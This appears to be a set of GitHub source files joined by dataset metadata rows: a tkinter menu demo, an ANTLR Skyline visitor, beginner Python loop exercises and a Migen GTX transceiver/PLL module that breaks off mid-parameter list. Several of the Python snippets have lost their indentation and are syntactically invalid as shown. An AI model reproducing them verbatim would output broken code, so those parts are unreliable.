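              json={'sid': 1, 'name': 'Asha', 'age': 21, 'address': 'Pune'})
print(requests.get('http://127.0.0.1:5000/student_details').json())
```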
74612380905 | import tkinter
win = tkinter.Tk()
win.title("hanyb")
win.geometry("400x400+200+0")
# menu bar
menubar = tkinter.Menu(win)
win.config(menu=menubar)
# create a menu
menu1 = tkinter.Menu(menubar, tearoff=False)
# add items to the menu
for item in ["Python","R","C","C++","Java","shell","c#","JS","PHP","汇编","NodeJS","quit"]:
if item =="quit":
# add a separator line
menu1.add_separator()
menu1.add_command(label=item, command=win.quit)
else:
menu1.add_command(label=item)
# attach the menu to the menu bar
menubar.add_cascade(label="语言", menu=menu1)
# create another menu
menu2 = tkinter.Menu(menubar, tearoff=False)
menu2.add_command(label="red")
menu2.add_command(label="white")
menu2.add_command(label="black")
menubar.add_cascade(label="color", menu=menu2)
win.mainloop() | hanyb-sudo/hanyb | tkinter/tkinter组件/16、Menu顶层菜单.py | 16、Menu顶层菜单.py | py | 850 | python | en | code | 0 | github-code | 36 |
73532863784 | if __name__ is not None and "." in __name__:
from .SkylineParser import SkylineParser
from .SkylineVisitor import SkylineVisitor
from .Skyline import Skyline
else:
from SkylineParser import SkylineParser
from SkylineVisitor import SkylineVisitor
from Skyline import Skyline
class EvalVisitor(SkylineVisitor):
def __init__(self):
self.identifiers = {}
def visitRoot(self, ctx: SkylineParser.RootContext):
l = [n for n in ctx.getChildren()]
return self.visit(l[0])
def visitStart(self, ctx: SkylineParser.StartContext):
l = [n for n in ctx.getChildren()]
if len(l) == 1:
return self.visit(l[0])
elif len(l) == 3:
identifier = l[0].getText()
skyline = self.visit(l[2])
self.identifiers[identifier] = skyline
return skyline
def visitSkyline(self, ctx: SkylineParser.SkylineContext):
l = [n for n in ctx.getChildren()]
return self.visit(l[0])
def visitPriority1(self, ctx: SkylineParser.Priority1Context):
l = [n for n in ctx.getChildren()]
skyline = self.visit(l[0])
if len(l) >= 3:
for i in range(2, len(l), 2):
if hasattr(l[i], 'getRuleIndex'):
skyline.union(self.visit(l[i]))
else:
if l[i - 1].getText() == '+':
skyline.right_shift(int(l[i].getText()))
else:
skyline.left_shift(int(l[i].getText()))
return skyline
def visitPriority2(self, ctx: SkylineParser.Priority2Context):
l = [n for n in ctx.getChildren()]
skyline = self.visit(l[0])
if len(l) >= 3:
for i in range(2, len(l), 2):
if hasattr(l[i], 'getRuleIndex'):
skyline.intersection(self.visit(l[i]))
else:
skyline.replication(int(l[i].getText()))
return skyline
def visitPriority3(self, ctx: SkylineParser.Priority3Context):
l = [n for n in ctx.getChildren()]
skyline = self.visit(l[len(l) - 1])
if len(l) == 2:
skyline.mirror()
return skyline
def visitPriority4(self, ctx: SkylineParser.Priority4Context):
l = [n for n in ctx.getChildren()]
if len(l) == 3:
return self.visit(l[1])
else:
return self.visit(l[0])
def visitIdentifier(self, ctx: SkylineParser.IdentifierContext):
identifier = ctx.getText()
return self.identifiers[identifier]
def visitBuilding(self, ctx: SkylineParser.BuildingContext):
l = [n for n in ctx.getChildren()]
skyline = Skyline()
skyline.building(int(l[1].getText()), int(l[3].getText()), int(l[5].getText()))
return skyline
def visitComposed(self, ctx: SkylineParser.ComposedContext):
l = [n for n in ctx.getChildren()]
skyline = self.visit(l[1])
if len(l) >= 5:
for i in range(3, len(l) - 1, 2):
skyline.union(self.visit(l[i]))
return skyline
def visitRandom(self, ctx: SkylineParser.RandomContext):
l = [n for n in ctx.getChildren()]
skyline = Skyline()
skyline.random(int(l[1].getText()), int(l[3].getText()), int(l[5].getText()), int(l[7].getText()), int(l[9].getText()))
return skyline
| anunez0/SkylineBot | cl/EvalVisitor.py | EvalVisitor.py | py | 3,416 | python | en | code | 0 | github-code | 36 |
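A typical ANTLR4 driver for the visitor above; SkylineLexer is assumed to be the generated lexer class and the input expression is only illustrative, so it may need adjusting to the actual grammar:

```python
from antlr4 import InputStream, CommonTokenStream
from SkylineLexer import SkylineLexer       # assumed generated lexer module
from SkylineParser import SkylineParser
from EvalVisitor import EvalVisitor

text = "(3,10,7) * (12,5,15)"               # illustrative expression only
lexer = SkylineLexer(InputStream(text))
tokens = CommonTokenStream(lexer)
tree = SkylineParser(tokens).root()         # 'root' matches visitRoot above
print(EvalVisitor().visit(tree))
```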
31065907035 | students = ['Mosh', 'musa', 'uthman', 'khalil', 'mustafa']
for s in students:
print(s)
numbers = [1, 2, 3, 45, 66, 55, 9, 900]
sum = 0
for n in numbers:
sum = sum + n
print(sum)
name = 'Uthman'
for s in name:
print(s)
number = [1, -2, -9, 8, 7, -6]
for n in number:
if n >=0:
print(n)
| itcentralng/python-class-july-2022 | Practice/Bukar/aug17_bukar.py | aug17_bukar.py | py | 320 | python | en | code | 0 | github-code | 36 |
8573106133 | total = 0
count = 0
while True :
inp = input('Enter Number: ')
if inp == 'done' : break
value = float(inp)
total = total + value
count = count + 1
average = total / count
print('Average:', average)
#This is a loop that takes the average of a bunch of
#numbers, and then spits out the total, but can be done
#better using a list
numlist = list()
#create a list
while True :
inp2 = input('Enter a number: ')
if inp2 == 'DONE' : break
valuu = float(inp2)
#input same code as before
numlist.append(valuu)
#rather than add to count, just append the list
avg = sum(numlist) / len(numlist)
#do regular commands to the list to make an avg sum/len
print('Your average is:' , avg)
#Instead of having to construct a count and total number,
#the list just does that for you, and you can just focus on
#getting the average by messing with the list rather than
#constructing a lot of attached strings | BunggoyLearn/Test | Averager.py | Averager.py | py | 935 | python | en | code | 0 | github-code | 36 |
38072060455 | from migen import *
from migen.genlib.resetsync import AsyncResetSynchronizer
from litex.soc.cores.clock import *
from litex.soc.interconnect.csr import *
from litex.soc.cores.prbs import PRBSTX, PRBSRX
from litex.soc.cores.code_8b10b import Encoder, Decoder
from liteiclink.transceiver.gtx_7series_init import GTXTXInit, GTXRXInit
from liteiclink.transceiver.clock_aligner import BruteforceClockAligner
from liteiclink.transceiver.common import *
from liteiclink.transceiver.prbs import *
class GTXChannelPLL(Module):
def __init__(self, refclk, refclk_freq, linerate):
self.refclk = refclk
self.reset = Signal()
self.lock = Signal()
self.config = self.compute_config(refclk_freq, linerate)
@staticmethod
def compute_config(refclk_freq, linerate):
for n1 in 4, 5:
for n2 in 1, 2, 3, 4, 5:
for m in 1, 2:
vco_freq = refclk_freq*(n1*n2)/m
if 1.6e9 <= vco_freq <= 3.3e9:
for d in 1, 2, 4, 8, 16:
current_linerate = vco_freq*2/d
if current_linerate == linerate:
return {"n1": n1, "n2": n2, "m": m, "d": d,
"vco_freq": vco_freq,
"clkin": refclk_freq,
"linerate": linerate}
msg = "No config found for {:3.2f} MHz refclk / {:3.2f} Gbps linerate."
raise ValueError(msg.format(refclk_freq/1e6, linerate/1e9))
def __repr__(self):
r = """
GTXChannelPLL
==============
overview:
---------
+--------------------------------------------------+
| |
| +-----+ +---------------------------+ +-----+ |
| | | | Phase Frequency Detector | | | |
CLKIN +----> /M +--> Charge Pump +-> VCO +---> CLKOUT
| | | | Loop Filter | | | |
| +-----+ +---------------------------+ +--+--+ |
| ^ | |
| | +-------+ +-------+ | |
| +----+ /N2 <----+ /N1 <----+ |
| +-------+ +-------+ |
+--------------------------------------------------+
+-------+
CLKOUT +-> 2/D +-> LINERATE
+-------+
config:
-------
CLKIN = {clkin}MHz
CLKOUT = CLKIN x (N1 x N2) / M = {clkin}MHz x ({n1} x {n2}) / {m}
= {vco_freq}GHz
LINERATE = CLKOUT x 2 / D = {vco_freq}GHz x 2 / {d}
= {linerate}GHz
""".format(clkin=self.config["clkin"]/1e6,
n1=self.config["n1"],
n2=self.config["n2"],
m=self.config["m"],
vco_freq=self.config["vco_freq"]/1e9,
d=self.config["d"],
linerate=self.config["linerate"]/1e9)
return r
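# Hedged usage sketch (added for illustration, not part of the original module):
# compute_config() is a pure search and can be exercised on its own to check that
# a refclk/linerate pair is reachable before instantiating the PLL. The
# 125 MHz / 2.5 Gbps values below are assumed, not taken from this file.
def _example_cpll_config():
    cfg = GTXChannelPLL.compute_config(125e6, 2.5e9)
    # The search guarantees a VCO inside 1.6-3.3 GHz and LINERATE = VCO*2/D.
    assert 1.6e9 <= cfg["vco_freq"] <= 3.3e9
    assert cfg["vco_freq"]*2/cfg["d"] == 2.5e9
    return cfg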
class GTXQuadPLL(Module):
def __init__(self, refclk, refclk_freq, linerate):
self.clk = Signal()
self.refclk = Signal()
self.reset = Signal()
self.lock = Signal()
self.config = self.compute_config(refclk_freq, linerate)
# DRP
self.drp = DRPInterface()
# # #
fbdiv_ratios = {
16: 1,
20: 1,
32: 1,
40: 1,
64: 1,
66: 0,
80: 1,
100: 1
}
fbdivs = {
16: 0b0000100000,
20: 0b0000110000,
32: 0b0001100000,
40: 0b0010000000,
64: 0b0011100000,
66: 0b0101000000,
80: 0b0100100000,
100: 0b0101110000
}
self.specials += \
Instance("GTXE2_COMMON",
p_QPLL_CFG=0x0680181 if self.config["vco_band"] == "upper" else
0x06801c1,
p_QPLL_FBDIV=fbdivs[self.config["n"]],
p_QPLL_FBDIV_RATIO=fbdiv_ratios[self.config["n"]],
p_QPLL_REFCLK_DIV=self.config["m"],
i_GTREFCLK0=refclk,
i_QPLLRESET=self.reset,
o_QPLLOUTCLK=self.clk,
o_QPLLOUTREFCLK=self.refclk,
i_QPLLLOCKEN=1,
o_QPLLLOCK=self.lock,
i_QPLLREFCLKSEL=0b001,
i_DRPADDR=self.drp.addr,
i_DRPCLK=self.drp.clk,
i_DRPDI=self.drp.di,
o_DRPDO=self.drp.do,
i_DRPEN=self.drp.en,
o_DRPRDY=self.drp.rdy,
i_DRPWE=self.drp.we,
)
@staticmethod
def compute_config(refclk_freq, linerate):
for n in 16, 20, 32, 40, 64, 66, 80, 100:
for m in 1, 2, 3, 4:
vco_freq = refclk_freq*n/m
if 5.93e9 <= vco_freq <= 8e9:
vco_band = "lower"
elif 9.8e9 <= vco_freq <= 12.5e9:
vco_band = "upper"
else:
vco_band = None
if vco_band is not None:
for d in [1, 2, 4, 8, 16]:
current_linerate = (vco_freq/2)*2/d
if current_linerate == linerate:
return {"n": n, "m": m, "d": d,
"vco_freq": vco_freq,
"vco_band": vco_band,
"clkin": refclk_freq,
"clkout": vco_freq/2,
"linerate": linerate}
msg = "No config found for {:3.2f} MHz refclk / {:3.2f} Gbps linerate."
raise ValueError(msg.format(refclk_freq/1e6, linerate/1e9))
def __repr__(self):
r = """
GTXQuadPLL
===========
overview:
---------
+-------------------------------------------------------------++
| +------------+ |
| +-----+ +---------------------------+ | Upper Band | +--+ |
| | | | Phase Frequency Detector +-> VCO | | | |
CLKIN +----> /M +--> Charge Pump | +------------+->/2+--> CLKOUT
| | | | Loop Filter +-> Lower Band | | | |
| +-----+ +---------------------------+ | VCO | +--+ |
| ^ +-----+------+ |
| | +-------+ | |
| +--------+ /N <----------------+ |
| +-------+ |
+--------------------------------------------------------------+
+-------+
CLKOUT +-> 2/D +-> LINERATE
+-------+
config:
-------
CLKIN = {clkin}MHz
CLKOUT = CLKIN x N / (2 x M) = {clkin}MHz x {n} / (2 x {m})
= {clkout}GHz
VCO = {vco_freq}GHz ({vco_band})
LINERATE = CLKOUT x 2 / D = {clkout}GHz x 2 / {d}
= {linerate}GHz
""".format(clkin=self.config["clkin"]/1e6,
n=self.config["n"],
m=self.config["m"],
clkout=self.config["clkout"]/1e9,
vco_freq=self.config["vco_freq"]/1e9,
vco_band=self.config["vco_band"],
d=self.config["d"],
linerate=self.config["linerate"]/1e9)
return r
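# Hedged usage sketch (added for illustration; 156.25 MHz / 5 Gbps are assumed
# values): the QPLL search is analogous, but the VCO must fall into one of the
# two QPLL bands and LINERATE = CLKOUT*2/D with CLKOUT = VCO/2.
def _example_qpll_config():
    cfg = GTXQuadPLL.compute_config(156.25e6, 5e9)
    assert cfg["vco_band"] in ("lower", "upper")
    assert cfg["clkout"]*2/cfg["d"] == 5e9
    return cfg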
class GTX(Module, AutoCSR):
def __init__(self, pll, tx_pads, rx_pads, sys_clk_freq, data_width=20,
tx_buffer_enable=False, rx_buffer_enable=False, clock_aligner=True,
tx_polarity=0, rx_polarity=0,
pll_master=True):
assert (data_width == 20) or (data_width == 40)
# TX controls
self.tx_restart = Signal()
self.tx_disable = Signal()
self.tx_produce_square_wave = Signal()
self.tx_prbs_config = Signal(2)
# RX controls
self.rx_ready = Signal()
self.rx_restart = Signal()
self.rx_prbs_config = Signal(2)
self.rx_prbs_errors = Signal(32)
# DRP
self.drp = DRPInterface()
# Loopback
self.loopback = Signal(3)
# # #
nwords = data_width//10
self.submodules.encoder = ClockDomainsRenamer("tx")(
Encoder(nwords, True))
self.decoders = [ClockDomainsRenamer("rx")(
Decoder(True)) for _ in range(nwords)]
self.submodules += self.decoders
# transceiver direct clock outputs
# useful to specify clock constraints in a way palatable to Vivado
self.txoutclk = Signal()
self.rxoutclk = Signal()
self.tx_clk_freq = pll.config["linerate"]/data_width
self.rx_clk_freq = pll.config["linerate"]/data_width
# control/status cdc
tx_produce_square_wave = Signal()
tx_prbs_config = Signal(2)
rx_prbs_config = Signal(2)
rx_prbs_errors = Signal(32)
self.specials += [
MultiReg(self.tx_produce_square_wave, tx_produce_square_wave, "tx"),
MultiReg(self.tx_prbs_config, tx_prbs_config, "tx"),
]
self.specials += [
MultiReg(self.rx_prbs_config, rx_prbs_config, "rx"),
MultiReg(rx_prbs_errors, self.rx_prbs_errors, "sys"), # FIXME
]
# # #
use_cpll = isinstance(pll, GTXChannelPLL)
use_qpll = isinstance(pll, GTXQuadPLL)
# TX generates TX clock, init must be in system domain
self.submodules.tx_init = tx_init = GTXTXInit(sys_clk_freq, buffer_enable=tx_buffer_enable)
self.comb += tx_init.restart.eq(self.tx_restart)
# RX receives restart commands from TX domain
self.submodules.rx_init = rx_init = ClockDomainsRenamer("tx")(
GTXRXInit(self.tx_clk_freq, buffer_enable=rx_buffer_enable))
self.comb += [
tx_init.plllock.eq(pll.lock),
rx_init.plllock.eq(pll.lock)
]
if pll_master:
self.comb += pll.reset.eq(tx_init.pllreset)
# DRP mux
self.submodules.drp_mux = drp_mux = DRPMux()
drp_mux.add_interface(self.drp)
rxcdr_cfgs = {
1 : 0x03000023ff10400020,
2 : 0x03000023ff10200020,
4 : 0x03000023ff10100020,
8 : 0x03000023ff10080020,
16 : 0x03000023ff10080020,
}
txdata = Signal(data_width)
rxdata = Signal(data_width)
self.gtx_params = dict(
# Simulation-Only Attributes
p_SIM_RECEIVER_DETECT_PASS ="TRUE",
p_SIM_TX_EIDLE_DRIVE_LEVEL ="X",
p_SIM_RESET_SPEEDUP ="FALSE",
p_SIM_CPLLREFCLK_SEL ="FALSE",
p_SIM_VERSION ="4.0",
# RX Byte and Word Alignment Attributes
p_ALIGN_COMMA_DOUBLE ="FALSE",
p_ALIGN_COMMA_ENABLE =0b1111111111,
p_ALIGN_COMMA_WORD =2 if data_width == 20 else 4,
p_ALIGN_MCOMMA_DET ="TRUE",
p_ALIGN_MCOMMA_VALUE =0b1010000011,
p_ALIGN_PCOMMA_DET ="TRUE",
p_ALIGN_PCOMMA_VALUE =0b0101111100,
p_SHOW_REALIGN_COMMA ="TRUE",
p_RXSLIDE_AUTO_WAIT =7,
p_RXSLIDE_MODE ="OFF" if rx_buffer_enable else "PCS",
p_RX_SIG_VALID_DLY =10,
# RX 8B/10B Decoder Attributes
p_RX_DISPERR_SEQ_MATCH ="TRUE",
p_DEC_MCOMMA_DETECT ="TRUE",
p_DEC_PCOMMA_DETECT ="TRUE",
p_DEC_VALID_COMMA_ONLY ="TRUE",
# RX Clock Correction Attributes
p_CBCC_DATA_SOURCE_SEL ="DECODED",
p_CLK_COR_SEQ_2_USE ="FALSE",
p_CLK_COR_KEEP_IDLE ="FALSE",
p_CLK_COR_MAX_LAT =9 if data_width == 20 else 20,
p_CLK_COR_MIN_LAT =7 if data_width == 20 else 16,
p_CLK_COR_PRECEDENCE ="TRUE",
p_CLK_COR_REPEAT_WAIT =0,
p_CLK_COR_SEQ_LEN =1,
p_CLK_COR_SEQ_1_ENABLE =0b1111,
p_CLK_COR_SEQ_1_1 =0b0100000000,
p_CLK_COR_SEQ_1_2 =0b0000000000,
p_CLK_COR_SEQ_1_3 =0b0000000000,
p_CLK_COR_SEQ_1_4 =0b0000000000,
p_CLK_CORRECT_USE ="FALSE",
p_CLK_COR_SEQ_2_ENABLE =0b1111,
p_CLK_COR_SEQ_2_1 =0b0100000000,
p_CLK_COR_SEQ_2_2 =0b0000000000,
p_CLK_COR_SEQ_2_3 =0b0000000000,
p_CLK_COR_SEQ_2_4 =0b0000000000,
# RX Channel Bonding Attributes
p_CHAN_BOND_KEEP_ALIGN ="FALSE",
p_CHAN_BOND_MAX_SKEW =1,
p_CHAN_BOND_SEQ_LEN =1,
p_CHAN_BOND_SEQ_1_1 =0b0000000000,
p_CHAN_BOND_SEQ_1_2 =0b0000000000,
p_CHAN_BOND_SEQ_1_3 =0b0000000000,
p_CHAN_BOND_SEQ_1_4 =0b0000000000,
p_CHAN_BOND_SEQ_1_ENABLE =0b1111,
p_CHAN_BOND_SEQ_2_1 =0b0000000000,
p_CHAN_BOND_SEQ_2_2 =0b0000000000,
p_CHAN_BOND_SEQ_2_3 =0b0000000000,
p_CHAN_BOND_SEQ_2_4 =0b0000000000,
p_CHAN_BOND_SEQ_2_ENABLE =0b1111,
p_CHAN_BOND_SEQ_2_USE ="FALSE",
p_FTS_DESKEW_SEQ_ENABLE =0b1111,
p_FTS_LANE_DESKEW_CFG =0b1111,
p_FTS_LANE_DESKEW_EN ="FALSE",
# RX Margin Analysis Attributes
p_ES_CONTROL =0b000000,
p_ES_ERRDET_EN ="FALSE",
p_ES_EYE_SCAN_EN ="TRUE",
p_ES_HORZ_OFFSET =0x000,
p_ES_PMA_CFG =0b0000000000,
p_ES_PRESCALE =0b00000,
p_ES_QUALIFIER =0x00000000000000000000,
p_ES_QUAL_MASK =0x00000000000000000000,
p_ES_SDATA_MASK =0x00000000000000000000,
p_ES_VERT_OFFSET =0b000000000,
# FPGA RX Interface Attributes
p_RX_DATA_WIDTH =data_width,
# PMA Attributes
p_OUTREFCLK_SEL_INV =0b11,
p_PMA_RSV =0x001e7080,
p_PMA_RSV2 =0x2050,
p_PMA_RSV3 =0b00,
p_PMA_RSV4 =0x00000000,
p_RX_BIAS_CFG =0b000000000100,
p_DMONITOR_CFG =0x000A00,
p_RX_CM_SEL =0b11,
p_RX_CM_TRIM =0b010,
p_RX_DEBUG_CFG =0b000000000000,
p_RX_OS_CFG =0b0000010000000,
p_TERM_RCAL_CFG =0b10000,
p_TERM_RCAL_OVRD =0b0,
p_TST_RSV =0x00000000,
p_RX_CLK25_DIV =5,
p_TX_CLK25_DIV =5,
p_UCODEER_CLR =0b0,
# PCI Express Attributes
p_PCS_PCIE_EN ="FALSE",
# PCS Attributes
p_PCS_RSVD_ATTR =0x000000000000,
# RX Buffer Attributes
p_RXBUF_ADDR_MODE ="FAST",
p_RXBUF_EIDLE_HI_CNT =0b1000,
p_RXBUF_EIDLE_LO_CNT =0b0000,
p_RXBUF_EN ="TRUE" if rx_buffer_enable else "FALSE",
p_RX_BUFFER_CFG =0b000000,
p_RXBUF_RESET_ON_CB_CHANGE ="TRUE",
p_RXBUF_RESET_ON_COMMAALIGN ="FALSE",
p_RXBUF_RESET_ON_EIDLE ="FALSE",
p_RXBUF_RESET_ON_RATE_CHANGE ="TRUE",
p_RXBUFRESET_TIME =0b00001,
p_RXBUF_THRESH_OVFLW =61,
p_RXBUF_THRESH_OVRD ="FALSE",
p_RXBUF_THRESH_UNDFLW =4,
p_RXDLY_CFG =0x001F,
p_RXDLY_LCFG =0x030,
p_RXDLY_TAP_CFG =0x0000,
p_RXPH_CFG =0x000000,
p_RXPHDLY_CFG =0x084020,
p_RXPH_MONITOR_SEL =0b00000,
p_RX_XCLK_SEL ="RXREC" if rx_buffer_enable else "RXUSR",
p_RX_DDI_SEL =0b000000,
p_RX_DEFER_RESET_BUF_EN ="TRUE",
# CDR Attributes
p_RXCDR_CFG =rxcdr_cfgs[pll.config["d"]],
p_RXCDR_FR_RESET_ON_EIDLE =0b0,
p_RXCDR_HOLD_DURING_EIDLE =0b0,
p_RXCDR_PH_RESET_ON_EIDLE =0b0,
p_RXCDR_LOCK_CFG =0b010101,
# RX Initialization and Reset Attributes
p_RXCDRFREQRESET_TIME =0b00001,
p_RXCDRPHRESET_TIME =0b00001,
p_RXISCANRESET_TIME =0b00001,
p_RXPCSRESET_TIME =0b00001,
p_RXPMARESET_TIME =0b00011,
# RX OOB Signaling Attributes
p_RXOOB_CFG =0b0000110,
# RX Gearbox Attributes
p_RXGEARBOX_EN ="FALSE",
p_GEARBOX_MODE =0b000,
# PRBS Detection Attribute
p_RXPRBS_ERR_LOOPBACK =0b0,
# Power-Down Attributes
p_PD_TRANS_TIME_FROM_P2 =0x03c,
p_PD_TRANS_TIME_NONE_P2 =0x3c,
p_PD_TRANS_TIME_TO_P2 =0x64,
# RX OOB Signaling Attributes
p_SAS_MAX_COM =64,
p_SAS_MIN_COM =36,
p_SATA_BURST_SEQ_LEN =0b0101,
p_SATA_BURST_VAL =0b100,
p_SATA_EIDLE_VAL =0b100,
p_SATA_MAX_BURST =8,
p_SATA_MAX_INIT =21,
p_SATA_MAX_WAKE =7,
p_SATA_MIN_BURST =4,
p_SATA_MIN_INIT =12,
p_SATA_MIN_WAKE =4,
# RX Fabric Clock Output Control Attributes
p_TRANS_TIME_RATE =0x0E,
# TX Buffer Attributes
p_TXBUF_EN ="TRUE" if tx_buffer_enable else "FALSE",
p_TXBUF_RESET_ON_RATE_CHANGE ="TRUE",
p_TXDLY_CFG =0x001F,
p_TXDLY_LCFG =0x030,
p_TXDLY_TAP_CFG =0x0000,
p_TXPH_CFG =0x0780,
p_TXPHDLY_CFG =0x084020,
p_TXPH_MONITOR_SEL =0b00000,
p_TX_XCLK_SEL ="TXOUT" if tx_buffer_enable else "TXUSR",
# FPGA TX Interface Attributes
p_TX_DATA_WIDTH =data_width,
# TX Configurable Driver Attributes
p_TX_DEEMPH0 =0b00000,
p_TX_DEEMPH1 =0b00000,
p_TX_EIDLE_ASSERT_DELAY =0b110,
p_TX_EIDLE_DEASSERT_DELAY =0b100,
p_TX_LOOPBACK_DRIVE_HIZ ="FALSE",
p_TX_MAINCURSOR_SEL =0b0,
p_TX_DRIVE_MODE ="DIRECT",
p_TX_MARGIN_FULL_0 =0b1001110,
p_TX_MARGIN_FULL_1 =0b1001001,
p_TX_MARGIN_FULL_2 =0b1000101,
p_TX_MARGIN_FULL_3 =0b1000010,
p_TX_MARGIN_FULL_4 =0b1000000,
p_TX_MARGIN_LOW_0 =0b1000110,
p_TX_MARGIN_LOW_1 =0b1000100,
p_TX_MARGIN_LOW_2 =0b1000010,
p_TX_MARGIN_LOW_3 =0b1000000,
p_TX_MARGIN_LOW_4 =0b1000000,
# TX Gearbox Attributes
p_TXGEARBOX_EN ="FALSE",
# TX Initialization and Reset Attributes
p_TXPCSRESET_TIME =0b00001,
p_TXPMARESET_TIME =0b00001,
# TX Receiver Detection Attributes
p_TX_RXDETECT_CFG =0x1832,
p_TX_RXDETECT_REF =0b100,
# CPLL Attributes
p_CPLL_CFG =0xBC07DC,
p_CPLL_FBDIV =1 if use_qpll else pll.config["n2"],
p_CPLL_FBDIV_45 =4 if use_qpll else pll.config["n1"],
p_CPLL_INIT_CFG =0x00001E,
p_CPLL_LOCK_CFG =0x01E8,
p_CPLL_REFCLK_DIV =1 if use_qpll else pll.config["m"],
p_RXOUT_DIV =pll.config["d"],
p_TXOUT_DIV =pll.config["d"],
p_SATA_CPLL_CFG ="VCO_3000MHZ",
# RX Initialization and Reset Attributes
p_RXDFELPMRESET_TIME =0b0001111,
# RX Equalizer Attributes
p_RXLPM_HF_CFG =0b00000011110000,
p_RXLPM_LF_CFG =0b00000011110000,
p_RX_DFE_GAIN_CFG =0x020FEA,
p_RX_DFE_H2_CFG =0b000000000000,
p_RX_DFE_H3_CFG =0b000001000000,
p_RX_DFE_H4_CFG =0b00011110000,
p_RX_DFE_H5_CFG =0b00011100000,
p_RX_DFE_KL_CFG =0b0000011111110,
p_RX_DFE_LPM_CFG =0x0954,
p_RX_DFE_LPM_HOLD_DURING_EIDLE =0b0,
p_RX_DFE_UT_CFG =0b10001111000000000,
p_RX_DFE_VP_CFG =0b00011111100000011,
# Power-Down Attributes
p_RX_CLKMUX_PD =0b1,
p_TX_CLKMUX_PD =0b1,
# FPGA RX Interface Attribute
p_RX_INT_DATAWIDTH =data_width == 40,
# FPGA TX Interface Attribute
p_TX_INT_DATAWIDTH =data_width == 40,
# TX Configurable Driver Attributes
p_TX_QPI_STATUS_EN =0b0,
# RX Equalizer Attributes
p_RX_DFE_KL_CFG2 =0x301148AC,
p_RX_DFE_XYD_CFG =0b0000000000000,
# TX Configurable Driver Attributes
p_TX_PREDRIVER_MODE =0b0
)
self.gtx_params.update(
# CPLL Ports
#o_CPLLFBCLKLOST =,
o_CPLLLOCK =Signal() if use_qpll else pll.lock,
i_CPLLLOCKDETCLK =ClockSignal(),
i_CPLLLOCKEN =1,
i_CPLLPD =0,
#o_CPLLREFCLKLOST =,
i_CPLLREFCLKSEL =0b001,
i_CPLLRESET =0 if use_qpll else pll.reset,
i_GTRSVD =0b0000000000000000,
i_PCSRSVDIN =0b0000000000000000,
i_PCSRSVDIN2 =0b00000,
i_PMARSVDIN =0b00000,
i_PMARSVDIN2 =0b00000,
i_TSTIN =0b11111111111111111111,
#o_TSTOUT =,
# Channel
i_CLKRSVD =0b0000,
# Channel - Clocking Ports
i_GTGREFCLK =0,
i_GTNORTHREFCLK0 =0,
i_GTNORTHREFCLK1 =0,
i_GTREFCLK0 =0 if use_qpll else pll.refclk,
i_GTREFCLK1 =0,
i_GTSOUTHREFCLK0 =0,
i_GTSOUTHREFCLK1 =0,
# Channel - DRP Ports
i_DRPADDR =drp_mux.addr,
i_DRPCLK =drp_mux.clk,
i_DRPDI =drp_mux.di,
o_DRPDO =drp_mux.do,
i_DRPEN =drp_mux.en,
o_DRPRDY =drp_mux.rdy,
i_DRPWE =drp_mux.we,
# Clocking Ports
#o_GTREFCLKMONITOR =,
i_QPLLCLK =0 if use_cpll else pll.clk,
i_QPLLREFCLK =0 if use_cpll else pll.refclk,
i_RXSYSCLKSEL =0b11 if use_qpll else 0b00,
i_TXSYSCLKSEL =0b11 if use_qpll else 0b00,
# Digital Monitor Ports
#o_DMONITOROUT =,
# FPGA TX Interface Datapath Configuration
i_TX8B10BEN =0,
# Loopback Ports
i_LOOPBACK =self.loopback,
# PCI Express Ports
#o_PHYSTATUS =,
i_RXRATE =0b000,
#o_RXVALID =,
# Power-Down Ports
i_RXPD =Cat(rx_init.gtXxpd, rx_init.gtXxpd),
i_TXPD =0b00,
# RX 8B/10B Decoder Ports
i_SETERRSTATUS =0,
# RX Initialization and Reset Ports
i_EYESCANRESET =0,
i_RXUSERRDY =rx_init.Xxuserrdy,
# RX Margin Analysis Ports
#o_EYESCANDATAERROR =,
i_EYESCANMODE =0,
i_EYESCANTRIGGER =0,
# Receive Ports - CDR Ports
i_RXCDRFREQRESET =0,
i_RXCDRHOLD =0,
#o_RXCDRLOCK =,
i_RXCDROVRDEN =0,
i_RXCDRRESET =0,
i_RXCDRRESETRSV =0,
# Receive Ports - Clock Correction Ports
#o_RXCLKCORCNT =,
# Receive Ports - FPGA RX Interface Datapath Configuration
i_RX8B10BEN =0,
# Receive Ports - FPGA RX Interface Ports
i_RXUSRCLK =ClockSignal("rx"),
i_RXUSRCLK2 =ClockSignal("rx"),
# Receive Ports - FPGA RX interface Ports
o_RXDATA =Cat(*[rxdata[10*i:10*i+8] for i in range(nwords)]),
# Receive Ports - Pattern Checker Ports
#o_RXPRBSERR =,
i_RXPRBSSEL =0b000,
# Receive Ports - Pattern Checker ports
i_RXPRBSCNTRESET =0,
# Receive Ports - RX Equalizer Ports
i_RXDFEXYDEN =1,
i_RXDFEXYDHOLD =0,
i_RXDFEXYDOVRDEN =0,
# Receive Ports - RX 8B/10B Decoder Ports
i_RXDISPERR =Cat(*[rxdata[10*i+9] for i in range(nwords)]),
#o_RXNOTINTABLE =,
# Receive Ports - RX AFE
i_GTXRXP =rx_pads.p,
i_GTXRXN =rx_pads.n,
# Receive Ports - RX Buffer Bypass Ports
i_RXBUFRESET =0,
#o_RXBUFSTATUS =,
i_RXDDIEN =0 if rx_buffer_enable else 1,
i_RXDLYBYPASS =1 if rx_buffer_enable else 0,
i_RXDLYEN =0,
i_RXDLYOVRDEN =0,
i_RXDLYSRESET =rx_init.Xxdlysreset,
o_RXDLYSRESETDONE =rx_init.Xxdlysresetdone,
i_RXPHALIGN =0,
o_RXPHALIGNDONE =rx_init.Xxphaligndone,
i_RXPHALIGNEN =0,
i_RXPHDLYPD =0,
i_RXPHDLYRESET =0,
#o_RXPHMONITOR =,
i_RXPHOVRDEN =0,
#o_RXPHSLIPMONITOR =,
#o_RXSTATUS =,
# Receive Ports - RX Byte and Word Alignment Ports
#o_RXBYTEISALIGNED =,
#o_RXBYTEREALIGN =,
#o_RXCOMMADET =,
i_RXCOMMADETEN =1,
i_RXMCOMMAALIGNEN =(rx_prbs_config == 0b00) if rx_buffer_enable else 0,
i_RXPCOMMAALIGNEN =(rx_prbs_config == 0b00) if rx_buffer_enable else 0,
# Receive Ports - RX Channel Bonding Ports
#o_RXCHANBONDSEQ =,
i_RXCHBONDEN =0,
i_RXCHBONDLEVEL =0b000,
i_RXCHBONDMASTER =0,
#o_RXCHBONDO =,
i_RXCHBONDSLAVE =0,
# Receive Ports - RX Channel Bonding Ports
#o_RXCHANISALIGNED =,
#o_RXCHANREALIGN =,
            # Receive Ports - RX Equalizer Ports
i_RXLPMHFHOLD =0,
i_RXLPMHFOVRDEN =0,
